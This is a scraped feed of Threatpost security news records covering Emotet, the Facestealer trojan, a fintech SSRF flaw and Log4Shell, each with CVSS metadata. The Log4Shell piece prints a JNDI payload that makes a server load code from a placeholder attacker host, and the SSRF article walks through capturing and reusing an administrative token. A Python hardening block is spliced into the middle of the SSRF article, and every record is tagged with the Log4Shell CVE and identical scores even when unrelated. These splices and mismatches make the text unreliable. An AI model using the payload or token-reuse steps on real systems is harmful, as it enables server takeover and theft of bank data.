The final stage of the attack chain occurs when the Emotet .DLL loads an encrypted PE from its resource section, they added.\n\n## **Microsoft to Block Macros by Default**\n\nLast week, Microsoft [announced a plan](<https://techcommunity.microsoft.com/t5/microsoft-365-blog/helping-users-stay-safe-blocking-internet-macros-by-default-in/ba-p/3071805>) to disable all macros by default in some applications, acknowledging that the mechanism is one of the world\u2019s most popular ways to deliver malware.\n\n\u201cFor the protection of our customers, we need to make it more difficult to enable macros in files obtained from the internet,\u201d the computing giant noted. \u201cVBA macros obtained from the internet will now be blocked by default.\u201d\n\nThree popular Office apps, Word, Excel and PowerPoint, plus Access and Visio, are affected by the change.\n\n\u201cFor macros in files obtained from the internet, users will no longer be able to enable content with a click of a button,\u201d Microsoft said. \u201cThe default is more secure and is expected to keep more users safe including home users and information workers in managed organizations.\u201d\n\nStarting in late April, instead of a button to \u201cenable macros,\u201d users will be prompted with a \u201clearn more\u201d button that will take them to additional information before they can activate macros within a document.\n\n**_Join Threatpost on Wed. Feb 23 at 2 PM ET for a [LIVE roundtable discussion](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>), \u201cThe Secret to Keeping Secrets,\u201d sponsored by Keeper Security, will focus on how to locate and lock down your organization\u2019s most sensitive data. Zane Bond with Keeper Security will join Threatpost\u2019s Becky Bracken to offer concrete steps to protect your organization\u2019s critical information in the cloud, in transit and in storage. 
[REGISTER NOW](<https://threatpost.com/webinars/protect-sensitive-cloud-data/?utm_source=Website&utm_medium=Article&utm_id=Keeper+Webinar>) and please Tweet us your questions ahead of time @Threatpost so they can be included in the discussion._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-16T13:39:33", "type": "threatpost", "title": "Emotet Now Spreading Through Malicious Excel Files", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-16T13:39:33", "id": "THREATPOST:66848A3C9B8917C8F84DFDC04DD5F6D9", "href": "https://threatpost.com/emotet-spreading-malicious-excel-files/178444/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-21T19:24:31", "description": "A popular mobile app in the official Google Play store called \u201cCraftsart Cartoon Photo Tools\u201d has racked up more than 100,000 installs \u2013 but unfortunately for the app\u2019s enthusiasts, it contains a version of the Facestealer Android malware.\n\nThat\u2019s according to researchers at Pradeo, who said the app performs somewhat as promised, 
pretending to be a legitimate photo editing tool. Specifically, it claims to allow users to convert photos into cartoon or \u201cpainting\u201d-style versions using a few different filters. However, behind this mask lies a \u201csmall piece of [malicious] code that easily slips under the radar of [the] store\u2019s safeguards,\u201d they explained.\n\nFacestealer is a [known Android threat](<https://threatpost.com/gaming-banking-trojans-mobile-malware/178571/>) that has made its way into Google Play in the past via trojanized apps. According to past Malwarebytes [analysis](<https://blog.malwarebytes.com/detections/android-trojan-spy-facestealer/>), when the application is first launched, it guides the user to the legitimate main Facebook login page and asks users to log in before they can use the app. Then, \u201cinjected malicious JavaScript steals the login credentials and sends them to a command-and-control server,\u201d according to the firm. \u201cThe C2 server makes use of login credentials to authorize access to the [account].\u201d\n\n[Splash page for the Craftsart Cartoon Photo Tools app, from Google Play.](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/21151430/google-play-malware.png>)\n\nFrom there, the trojan is off to the data-stealing races: It lifts information from victims\u2019 Facebook accounts, including email addresses and IP addresses, phone numbers, conversations and messaging histories, credit-card details, friend lists and more.\n\n\u201cWhen your login credentials for a social-media account have been stolen this can have serious consequences,\u201d explained Pradeo researchers, in a [Monday writeup](<https://blog.pradeo.com/spyware-facestealer-google-play>). 
\u201cIt gives threat actors a base from which to gather more information.\u201d They added, \u201cFacebook credentials are used by cybercriminals to compromise accounts in multiple ways, the most common being to commit financial fraud, send phishing links and spread fake news.\u201d\n\nA Pradeo analysis of Craftsart Cartoon Photo Tools found that the app connects to a Russian-registered domain that has served for at least seven years as the command-and-control (C2) address for various malicious Android apps.\n\n\u201c[The domain] is connected to multiple malicious mobile applications that were at some points available on Google Play and later deleted,\u201d they explained. \u201cTo maintain a presence on Google Play, repackaging mobile apps is common practice for cybercriminals. Sometimes, we even observed cases in which repackaging was entirely automated.\u201d\n\nPradeo researchers said they alerted the Google Play team about the app, but as of Monday, it was [still available](<https://play.google.com/store/apps/details?id=com.craftstoon.cartoonphoto>) in the official store. Users who installed it should delete the app from their phones immediately and, since it harvests Facebook logins, change their Facebook password.\n\n## **Avoiding Google Play Malware**\n\nKaspersky, in a [February posting](<https://securelist.com/mobile-malware-evolution-2021/105876/>), noted that malware was [increasingly popping up](<https://threatpost.com/updated-joker-malware-android-apps/167776/>) in Google Play, using the same tactic that Craftsart Cartoon Photo Tools uses.\n\n\u201cThe most common way to sneak malware onto Google Play is for a trojan to mimic a legitimate app already published on the site (for example, a photo editor or a VPN service) with the addition of a small piece of code to decrypt and launch a payload from the trojan\u2019s body or download it from the attackers\u2019 server,\u201d researchers explained. 
\u201cOften, to complicate dynamic analysis, unpacking actions are performed through commands from the attackers\u2019 server and in several steps: each decrypted module contains the address of the next one, plus instructions for decrypting it.\u201d\n\nUsers should thus always be wary of any app with warning signs. In this case, even though the app has managed to attract a large number of installs, there are definite red flags in the reviews.\n\nSome users flagged the forced Facebook login, commenting that it must be \u201csome kind of phishing.\u201d Other comments included \u201cfake fake fake\u201d and \u201cvery very very bad app,\u201d which sum up the overall reactions of reviewers. Some also noted that the functionality the app claims to have is limited or nonexistent, always a sign to stay away.\n\nIn all, Craftsart Cartoon Photo Tools has a 2.1-star rating, with the majority of the reviews being one-star assessments, balanced out by a handful of obviously fake five-star reviews. There are no two-, three- or four-star ratings, which is clearly telling.\n\n_**Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-21T19:18:32", "type": "threatpost", "title": "Facestealer Trojan Hidden in Google Play Plunders Facebook Accounts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-21T19:18:32", "id": "THREATPOST:08E51C6FB9418179611DF2ACFB1073BF", "href": "https://threatpost.com/facestealer-trojan-google-play-facebook/179015/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T13:47:15", "description": "A [server-side request forgery (SSRF) flaw](<https://threatpost.com/microsoft-azure-flaws-servers-takeover/159965/>) in an API of a large 
financial technology (fintech) platform potentially could have compromised millions of bank customers, allowing attackers to defraud clients by controlling their bank accounts and funds, researchers have found.\n\nA team at [Salt Security\u2019s](<https://salt.security/>) [Salt Labs](<https://salt.security/blog-authors/salt-labs>) identified the vulnerability in an API on a web page that supports the platform\u2019s fund-transfer functionality, which allows clients to transfer money from their accounts on the platform into their bank accounts, researchers disclosed in [a report published Thursday](<https://salt.security/blog/api-threat-research-server-side-request-forgery-on-fintech-platform-enabled-administrative-account-takeover>).\n\nThe company in question, dubbed \u201cAcme Fintech\u201d to preserve its anonymity, offers a \u201cdigital transformation\u201d service for banks of all sizes, allowing the institutions to move traditional banking services online. The platform has already been integrated into many banks\u2019 systems and thus has millions of active daily users, researchers said.\n\nIf the flaw had been exploited, attackers could have performed various nefarious activities by gaining administrative access to the banking system using the platform. 
From there they could have leaked users\u2019 personal data, accessed banking details and financial transactions, and performed unauthorized fund transfers into their own bank accounts, researchers said.\n\nUpon identifying the vulnerability, researchers reviewed their findings with the organization and provided recommended mitigations, they said.\n\n## **High Reward for Threat Actors**\n\nAPI flaws are often overlooked, but researchers at Salt Labs said in the report that they \u201csee vulnerabilities like this one and other API-related issues on a daily basis.\u201d\n\nIndeed, 95 percent of organizations experienced an API security incident in the past 12 months, according to the company\u2019s [State of API Security](<https://salt.security/api-security-trends?>) report for the first quarter of 2022. The same period also showed significant growth in malicious API traffic, they said.\n\n\u201c[Critical SSRF flaws](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) are more common than many FinTech providers and banking institutions realize,\u201d Yaniv Balmas, vice president of research for Salt Security, said in a press statement. \u201cAPI attacks are becoming more frequent and complex.\u201d\n\nFintech companies are especially exposed because their customers and partners rely on a vast network of APIs to drive interactions between websites, mobile applications, custom integrations and other systems, researchers said.\n\nThis, in turn, makes them \u201cprime targets by attackers looking to abuse API vulnerabilities\u201d for a couple of reasons, researchers wrote.\n\n\u201cOne, their API landscape and overall functionality is very rich and complex, which leaves a lot of room for mistakes or overlooking details in development,\u201d they wrote. 
\u201cTwo, if a bad actor can successfully abuse this type of platform, the potential profits are huge, since it could allow control of millions of users\u2019 bank accounts and funds.\u201d\n\n## **The Vulnerability**\n\nResearchers discovered the flaw while scanning and recording all traffic sent and received across the organization\u2019s website. On a page that connects clients to various banks so they can transfer funds to their bank accounts, researchers discovered an issue with the API the browser calls to handle the request.\n\n\u201cThis specific API is using the endpoint located at \u2018/workflows/tasks/{TASK_GUID}/values,\u2019 the HTTP method used to call it is PUT, and the specific request data is sent in the HTTP body section,\u201d researchers explained.\n\nThe request also carries a JWT bearer token: a cryptographically signed token that tells the server who the requesting user is and what permissions that user has.\n\nThe flaw was in the request parameters that send the required data for a funds transfer, specifically a parameter called \u201cInstitutionURL,\u201d researchers explained. This is a user-provided value containing a URL that points to some GUID value hosted on the receiving bank\u2019s website.\n\nIn this case, the web server handled the user-supplied URL by contacting it directly, allowing an SSRF: the server would issue a request to an arbitrary URL substituted for the legitimate bank\u2019s URL, researchers explained.\n\n## **Exposing the SSRF Flaw**\n\nResearchers demonstrated this flaw by forging a malformed request containing their own domain. 
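What made InstitutionURL exploitable is that the server fetched whatever the client put in it. Below, as an added example written for this page rather than code from Salt Labs or the platform, is the vulnerable behaviour beside a hardened version in Python. The hardened handler accepts only https URLs whose host is on a server-side allowlist of registered institutions, requires the path to end in a transfer GUID, refuses hosts that resolve to non-public addresses (so a registered name cannot be rebound to internal infrastructure), rebuilds the URL from the validated parts, and never copies the platform's own bearer token into the outbound request. The institution hostnames, the fake DNS table, the GUID and the secret are constructed.

```python
"""InstitutionURL handling: the SSRF-prone version beside a hardened one.

Added example for this page; hostnames, DNS answers and secrets are constructed.
"""
import ipaddress
import re
from typing import Callable, Dict, List
from urllib.parse import urlsplit, urlunsplit

# Server-side registry of institutions the platform is integrated with (hypothetical names).
REGISTERED_HOSTS = {"api.first-example-bank.test", "transfer.second-example-bank.test"}
GUID_RE = re.compile(r"^[0-9a-f]{8}(-[0-9a-f]{4}){3}-[0-9a-f]{12}$", re.IGNORECASE)

# Stand-in for DNS so the example runs offline; the answers are placeholders.
FAKE_DNS: Dict[str, List[str]] = {
    "api.first-example-bank.test": ["93.184.216.34"],
    "transfer.second-example-bank.test": ["93.184.216.35"],
}


class SSRFRejected(ValueError):
    """The client-supplied URL must not be fetched by the server."""


def fake_resolve(host: str) -> List[str]:
    return FAKE_DNS.get(host, [])


def vulnerable_target(institution_url: str) -> str:
    """The behaviour Salt Labs observed: the server contacts whatever URL the client sent."""
    return institution_url


def safe_target(institution_url: str, resolve: Callable[[str], List[str]] = fake_resolve) -> str:
    """Return a URL the server may fetch, or raise SSRFRejected.

    `resolve` is injected so the same DNS answer can be pinned for the actual connection;
    re-resolving at connect time would reopen a DNS-rebinding window.
    """
    parts = urlsplit(institution_url)
    if parts.scheme != "https":
        raise SSRFRejected("only https is allowed")
    if parts.username or parts.password:
        raise SSRFRejected("userinfo is not allowed")          # https://bank@attacker.test/
    if parts.port not in (None, 443):
        raise SSRFRejected("non-standard port is not allowed")
    host = (parts.hostname or "").lower().rstrip(".")
    if host not in REGISTERED_HOSTS:
        raise SSRFRejected(f"{host!r} is not a registered institution")
    guid = parts.path.rsplit("/", 1)[-1]
    if not GUID_RE.match(guid):
        raise SSRFRejected("path must end in a transfer GUID")
    ips = resolve(host)
    if not ips or not all(ipaddress.ip_address(ip).is_global for ip in ips):
        raise SSRFRejected(f"{host!r} resolves to a non-public address")
    # Rebuild from validated parts; any query string or fragment from the client is dropped.
    return urlunsplit(("https", host, parts.path, "", ""))


def rejects(institution_url: str, resolve: Callable[[str], List[str]] = fake_resolve) -> bool:
    """True if safe_target refuses the URL (convenience for tests and logging)."""
    try:
        safe_target(institution_url, resolve)
    except SSRFRejected:
        return True
    return False


def outbound_headers(inbound: Dict[str, str], institution_secret: str) -> Dict[str, str]:
    """Headers for the server-to-institution request.

    Inbound Authorization/Cookie values (the platform's own JWT) are never copied across;
    forwarding them is what put an administrative token on the researchers' listener.
    """
    passthrough = {k: v for k, v in inbound.items()
                   if k.lower() not in ("authorization", "cookie", "x-api-key")}
    passthrough["Authorization"] = f"Bearer {institution_secret}"
    return passthrough
```

The simplest design avoids the problem entirely by having the client send an institution identifier and letting the server look up the URL; the validator above is for the case where the URL-shaped parameter has to stay for compatibility.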
The connection coming into their server was made successfully, proving that \u201cthe server blindly trusts domains provided to it in this parameter and issues a request to that URL,\u201d they wrote.\n\nFurther, the request that came into their server included a JWT token used for authentication, which turned out to be a different one than the token included in the original request.\n\nResearchers embedded the new JWT token into a request they\u2019d previously encountered to an endpoint named \u201c/accounts/account,\u201d which had allowed them to retrieve information from a bank account. This time they returned even more information, they said.\n\n\u201cThe API endpoint recognized our new JWT administrative token and very gracefully returned a list of every user and its details across the platform,\u201d researchers revealed.\n\nTrying the request again to an endpoint named \u201c/transactions/transactions\u201d with the new token also allowed them to access a list of all transactions made by every user on the banking system, they said.\n\n\u201cThis vulnerability is a critical flaw, one that completely compromises every bank user,\u201d researchers said. 
\u201cHad bad actors discovered this vulnerability, they could have caused serious damage for both [the organization] and its users.\u201d\n\nSalt Labs hopes that shining a light on API threats will inspire security practitioners to take a closer look at how their systems may be vulnerable in this way, Balmas said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-04-07T13:46:17", "type": "threatpost", "title": "SSRF Flaw in Fintech Platform Allowed for Compromise of Bank Accounts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-04-07T13:46:17", "id": "THREATPOST:B7C8B7F3016D73355C4ED5E05B0E8490", "href": "https://threatpost.com/ssrf-flaw-fintech-bank-accounts/179247/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-14T20:32:17", "description": "News of the Log4Shell vulnerability is everywhere, with security experts variously calling the Apache log4j logging library bug a recipe for an \u201cinternet meltdown,\u201d as well as the \u201cworst cybersecurity bug of the year.\u201d Names like \u201cApple,\u201d 
\u201cTwitter\u201d and \u201cCloudflare\u201d are being bandied about as being vulnerable, but what does the issue mean for small- and medium-sized businesses?\n\nWe asked security experts to weigh in on the specific effects (and advice/remedies) for SMBs in a set of roundtable questions, aimed at demystifying the firehose of information around the headline-grabbing issue.\n\nIt may seem overwhelming for smaller companies. But our experts, from Anchore, Cybereason, Datto, ESET, HackerOne, Invicti Security, Lacework and Mitiga, have weighed in here with exclusive, practical advice and explanations specifically for SMBs dealing with Log4Shell.\n\n_\u201cWiz research shows that more than 89 percent of all environments have vulnerable log4j libraries. And in many of them, the dev teams are sure they have zero exposure \u2014 and are surprised to find out that some third-party component is actually built using Java.\u201d \u2014 Ami Luttwak, co-founder and CTO at Wiz, which has seen its usage double as a result of Log4Shell (via email to Threatpost)._\n\n_**Questions answered:**_\n\n * What bad Log4Shell outcomes are possible for SMBs?\n * How is a real-world Log4Shell attack carried out?\n * How can SMBs prepare for Log4Shell without a dedicated security team?\n * What happens if an SMB uses an MSP?\n * What applications should SMBs worry about being attacked?\n * How can SMBs remediate a Log4Shell attack?\n * Final thoughts\n\n## Background on Log4Shell\n\nLog4Shell ([CVE-2021-44228](<https://threatpost.com/zero-day-in-ubiquitous-apache-log4j-tool-under-active-attack/176937/>)) affects applications that rely on the log4j library to log data. Because that library is almost ubiquitous in Java applications, virtually any business that has a website is highly likely to be affected. 
With one line of malicious code, attackers are able to execute malware or commands on a target application and take over the server that houses it.\n\nFrom there, an attacker can carry out any number of further attacks.\n\n\u201cSmall businesses are at significant risk because plenty of the software they rely on may be vulnerable, and they do not have the resources to patch quickly enough,\u201d Ofer Maor, Mitiga CTO, told Threatpost.\n\nSMBs also tend to rely on third-party software suppliers and managed service providers (MSPs) for their technology infrastructure, which reduces cost and reduces the need for dedicated IT staff. However, this unfortunately puts SMBs at even worse risk, because they need to rely on their third-party vendors to patch and respond in many cases.\n\nThe bug was first disclosed as a zero-day vulnerability last week, but an emergency fix has been rolled out that now must be incorporated by the many developers who use log4j in their applications. The steps to address Log4Shell for SMBs thus include identifying potentially affected applications (including those provided by MSPs), confirming the vulnerability\u2019s impact within them, and applying or confirming updates as soon as possible. SMBs will also need to determine whether they\u2019re already compromised and remediate the issue if so.\n\nAll of this should take priority since [a slew of attacks is imminent](<https://threatpost.com/log4shell-attacks-origin-botnet/176977/>), thanks to an exploit becoming publicly available online, researchers noted.\n\n\u201cNumerous attack groups are already [actively exploiting](<https://threatpost.com/apache-log4j-log4shell-mutations/176962/>) this vulnerability, mostly through automated scripts,\u201d Maor warned. 
\u201cThis means we expect to see this being exploited in masses, hitting tens of thousands or even more targets.\u201d\n\n## What Bad Log4Shell Outcomes Are Possible for SMBs?\n\n**Ofer Maor, Mitiga CTO:** One of the concerns is that a lot of these attacks now will focus on getting initial access only and establishing persistence (that is, installing something that will allow the attacker to have access to their systems later, even after the vulnerability has been fixed).\n\n**Marc-\u00c9tienne L\u00e9veill\u00e9, malware researcher for ESET:** SMBs providing online services may expose their system to malware and data exfiltration if their systems use the log4j software to log events. The risk is quite high, given the exploit is available online and relatively easy to trigger. Once into the network, cybercriminals could pivot to gain access to additional resources.\n\n**Josh Bressers, vice president of security at Anchore:** This vulnerability allows attackers to run the code of their choosing, such as a cryptominer, a backdoor or data-stealing malware, for example. One of the challenges for a vulnerability like this is the attacker landscape is changing rapidly. So far, most of the attacks seem to be using compute resources to mine cryptocurrency, but these attacks are changing and evolving each hour. It is expected that the attacks will gain in sophistication over the coming days and weeks.\n\n**Mark Nunnikhoven, distinguished cloud strategist at Lacework:** Unfortunately\u2026an attacker can take over your system or steal your data quite easily using this vulnerability.\n\n**Pieter Ockers, senior director of technical services at HackerOne:** In a more devastating case, criminals that gain initial access to the victim\u2019s environment could auction that access off to crews that specialize in executing ransomware attacks. 
SMBs should be hyper-aware of any of their software vendors/MSPs that use Apache log4j in case they are affected by a breach; I suspect we might hear of some ransomware attacks soon stemming from this vulnerability.\n\n## How Is a Real-World Log4Shell Attack Carried Out?\n\n**Cybereason CTO Yonatan Striem-Amit:** The most prevalent attack scenarios we\u2019ve seen are abusing things like the user agent or things like a log-in screen. If an application has a log-in page where a user is asked to put his username and password (and a lot of them do), an attacker could just supply the malicious string within that user field and get code execution on that server. After that he essentially controls logins, and therefore can start doing whatever he wants on that server, including, of course, eavesdropping into every other user who\u2019s logging in to the environment with their password.\n\n**Adam Goodman, vice president of product management at Invicti Security:** This attack is astonishingly easy to execute. This is because it may not require authentication to execute, nor would it require penetrating multiple application and/or networking layers to begin the exploit. It\u2019s simply a text string sent to any places that will be logged. And finding such a place is very easy \u2013 it can be a simple header, or a simple text field or error condition sent to a log file.\n\nTo exploit Log4Shell, the attacker may use any user input subsequently logged by the log4j framework. For example, in the case of a web application, it may be any text entry field or HTTP header such as User-Agent. Server logging is often set to log headers as well as form data.\n\nThe attacker only needs to include the following string in the logged user input:\n\n${jndi:ldap://attacker.com/executeme}\n\nWhere attacker.com is a server controlled by the attacker and executeme is the Java class to be executed on the victim server. 
And this is just one of many ways to exploit this vulnerability.\n\n**Lacework\u2019s Nunnikhoven:** \u201cA real-world attack can be as simple as the attacker sending a specifically crafted web request to a vulnerable server. When the server processes that request, the attacker then has access to the server. The Lacework Labs team has documented this attack and some other technical aspects of attacks we\u2019ve seen in [this blog post](<https://www.lacework.com/blog/lacework-labs-identifies-log4j-attackers/>).\u201d\n\n**Anchore\u2019s Bressers:** Attackers send requests to vulnerable applications; this triggers the vulnerability. The application then downloads a cryptocurrency mining application, in one scenario, and runs it on the compromised system. The cryptomining application then consumes large amounts of the victim\u2019s processing power while the attacker claims the cryptomining rewards.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/12/14151922/log4j-e1639513188979.png>)\n\nTrend Micro published this attack-scenario flow on Tuesday (https://www.zerodayinitiative.com/blog/2021/12/14/the-december-2021-security-update-review).\n\n## How Can SMBs Address Log4Shell without a Dedicated Security Team?\n\n**HackerOne\u2019s Ockers:** These kinds of wide-sweeping cyberattacks will always be a bigger challenge for those that lack a dedicated security team. If only one or two individuals in IT are working to monitor security, it\u2019s even more important you\u2019re prepared and have already taken stock of the software you\u2019re using and your vendor\u2019s software. Once you gain that visibility, I recommend patching any instances you find of log4j and updating the software to version 2.15.0 in your own software. 
I\u2019d also confirm any vendors\u2019 exposure and incident management around log4j patching and response.\n\n_According to [Microsoft\u2019s recent blog](<https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/>), the log4j 2 library is included in widely deployed Apache products including Struts 2, Solr, Druid, Flink and Swift. SMBs that have built applications with these products should conduct a code audit to determine if the vulnerable version of log4j is in use._\n\n**Mitiga\u2019s Maor:** SMBs should set up an immediate task force to map all affected homegrown systems and patch them, while allowing IT to map all external systems and communicate with the censored systems.\n\n**Anchore\u2019s Bressers:** This vulnerability is going to be especially challenging for small and medium business users without a dedicated security team. Ideally software vendors are being proactive in their investigations and updates and are contacting affected customers, but this is not always the case.\n\nDepending on the level of technical acumen an organization has, there are steps that can be taken to detect and resolve the issue themselves. There are various open-source tools that exist to help detect this vulnerability on systems such as [Syft and Grype](<https://www.infoworld.com/article/3644492/how-to-detect-the-log4j-vulnerability-in-your-applications.html>). CISA has [released guidance](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) regarding this vulnerability, including steps a business can take.\n\n**Lacework\u2019s Nunnikhoven:** While IT knowledge is required, the basic steps don\u2019t require a security team. IT teams should be trying to find systems that use log4j in their environment and then apply one of the techniques the fantastic team of volunteers with the log4j project have published or the recommended guidance from that system\u2019s vendors. 
This is a lot of work but it\u2019s necessary to reduce the risk to your business.\n\n_The log4j team\u2019s resource is [available here](<https://logging.apache.org/log4j/2.x/security.html>), in the mitigation section under the \u201cFixed in Log4j 2.15.0\u201d heading. Many organizations have also published free tools to help identify vulnerable applications, [like this one](<https://about.sourcegraph.com/blog/log4j-log4shell-0-day/>), [this one](<https://log4j-tester.trendmicro.com/>) or [this one](<https://github.com/hillu/local-log4j-vuln-scanner>)._\n\n**Invicti\u2019s Adam Goodman:** It\u2019s a nightmare of a problem if you have a surplus of Java applications deployed everywhere, not just on the primary website. Organizations should immediately determine where and how they directly or indirectly use this library and then take steps to mitigate the vulnerability by either upgrading the library or modifying Java system properties to disable the vulnerable functionality.\n\nAim to ensure that all applications have limited outbound internet connectivity, and use Ansible scripts or adequate security tools to scan _en masse_ for the vulnerability before forcibly patching it. It\u2019s crucial to use security tools that target all of the applications they can find so that organizations have a more accurate window into their security posture.\n\nOrganizations that lack sufficient budget to invest in discovery tools should make a list of Java applications which they add to continually, and check them off, while prioritizing apps that present the most risk if exploited.\n\n## What Happens if an SMB Uses an MSP?\n\n**Anchore\u2019s Bressers:** I would expect an MSP to take the lead on this issue for their customers. An MSP should be monitoring their infrastructure for indicators of compromise, applying workarounds when possible, and updating the managed applications as vendor updates become available. 
Any business using MSP services should reach out to their provider and request a status update on Log4Shell.\n\n**Ryan Weeks, CISO at Datto:** Cyber-threats are always prevalent. Especially for small to medium-sized businesses (SMBs) \u2013 [78 percent](<https://www.datto.com/resources/dattos-2020-global-state-of-the-channel-ransomware-report>) of MSPs reported attacks against their client SMBs in the last two years alone. MSPs have a responsibility to diligently check for vulnerabilities and arm their customers with the tools to combat them. It\u2019s not enough to simply install routine software updates. SMBs need to ensure their partners proactively push out security updates for any affected products, and continually monitor for potential exploits.\n\n**Invicti\u2019s Adam Goodman:** This is an issue front-and-center in the security community and if an organization is using an MSP, it\u2019s highly likely that MSP is actively working on this. Confirm that a ticket and incident is open for this vulnerability, and ask the MSP for a list of managed applications that are under remediation. It\u2019s vital to review that list of apps for anything that\u2019s missing, including any back-office or forgotten tools in the mix. Ensure the MSP has visibility into the attack surface so that you both can better handle necessary containment steps moving forward.\n\n**Lacework\u2019s Nunnikhoven:** A managed service provider can help update and fix the systems they manage. A managed security service provider can help detect and stop attacks aimed at this issue, and help investigate any attacks that may have already taken place. The first step in both cases is speaking with your MSP/MSSP to understand the steps they are taking to help protect their customers.\n\n## What Applications Should SMBs Worry About?\n\n**Mitiga\u2019s Maor:** Impact can vary significantly as many custom-developed and off-the-shelf products are impacted. 
Many adversaries are using the vulnerability as part of mass-scanning efforts to identify vulnerable systems. Likewise, some known malware strains have already incorporated exploitation of this vulnerability into their spreading mechanisms. Any Java application might be affected.\n\n**Invicti\u2019s Adam Goodman:** SMBs should address worries and concerns based on business risk. Internet-facing apps should receive immediate priority, followed by applications that are critical to the software supply chain or back-office and financial applications. There is also an excellent effort from the security community to compile all affected technologies; [it can be found here](<https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592>).\n\n**ESET\u2019s L\u00e9veill\u00e9:** As a first step, SMBs should ask questions of the organization providing their internet-facing services such as their website. Then they should see if any of their applications use log4j to generate logs. Java applications and webservices would be the first to look at because log4j is a Java library.\n\n**Cybereason\u2019s Striem-Amit:** The world of Java and open source has so many dependencies, where a company might use one product, but it actually carries with it a dozen other libraries. So log4j could be present even though a company might not necessarily even be aware or \u2026 done it directly. So the scanning and the analysis is severely complex. And you have to go in each one of your servers and see, are we using log4j either directly or indirectly in that environment.\n\n## How Can SMBs Remediate a Successful Log4Shell Attack?\n\n**Mitiga\u2019s Maor:** Thankfully, there\u2019s a lot that can be done to harden environments. For customers with internally developed applications, limiting outbound internet connections from servers to only whitelisted hosts is a great step, if challenging to implement. 
